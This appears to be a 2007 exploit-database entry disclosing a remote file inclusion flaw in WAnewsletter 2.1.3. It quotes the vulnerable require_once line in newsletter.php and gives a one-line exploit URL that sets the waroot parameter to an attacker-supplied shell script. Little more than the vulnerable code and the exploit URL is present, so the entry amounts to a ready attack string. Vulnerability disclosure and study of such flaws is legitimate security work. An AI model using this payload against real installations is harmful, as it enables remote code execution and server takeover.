wanewsletter 2.1.3 - Remote File Inclusion

EDB-ID:

4000


Author:

Mogatil

Type:

webapps


Platform:

PHP

Date:

2007-05-28


======================= S==A==U==D==I ========================

WAnewsletter-2.1.3 (newsletter.php) RFI Vul

==============================================================

Found By : Mogatil , jjl@hotmail.com

==============================================================

Script Site : http://script.emanual.ru/get?i=1053

==============================================================
File : /newsletter.php


require_once($waroot . 'start.php');

==============================================================

Thanx: cold zero . gawey Al Azary . crazy man . scorbion_22 .
the_muslim_sniper

==============================================================

Exploit :[Path]/newsletter/newsletter.php?waroot=shell

==============================================================

# milw0rm.com [2007-05-28]